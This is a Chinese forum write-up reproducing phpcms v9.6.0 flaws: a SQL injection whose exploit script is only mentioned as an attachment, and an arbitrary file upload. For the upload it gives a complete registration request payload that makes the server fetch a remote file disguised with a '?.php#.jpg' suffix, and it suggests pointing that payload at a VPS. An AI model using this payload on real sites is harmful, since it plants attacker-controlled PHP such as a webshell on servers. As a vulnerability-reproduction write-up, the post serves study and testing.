phpcms 漏洞复现

Track-mss   ·   发表于 2021-08-24 20:07:28   ·   CTF&WP专版

0x01 phpcms v9.6.0 sql注入漏洞

此处直接使用exp,python脚本来复现漏洞。复现结果如下:

exp.py文件在附件中,需要在文件内更改url和语句来食用:)

0x02 phpcms v9.6.0 文件上传漏洞

打开网站,来到注册页

填好信息,提交的时候进行抓包

发送到repeater后,进行数据修改,即替换以下payload(注册信息自定义):

  1. siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://127.0.0.1/phpcms96/phpinfo.txt?.php#.jpg>&dosubmit=1&protocol=

重点:modelid值必须为11,否则无法成功。

并且注意“127.0.0.1”ip可换成vps的ip或网址,此处为了复现的方便在本地创建了一句话文件。并且注册信息要改变(即username,email等字段),不然可能会失败。

文本文件phpinfo.txt内容为<?php phpinfo() ?>, 作测试用。

点击“send”后得到响应包,可见包含了上传文件的地址:

访问该地址,可见文件已成功上传。

打赏我,让我更有动力~

1 条回复   |  直到 2022-4-24 | 1995 次浏览

没勇气先生
发表于 2022-4-24

附件呢?

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.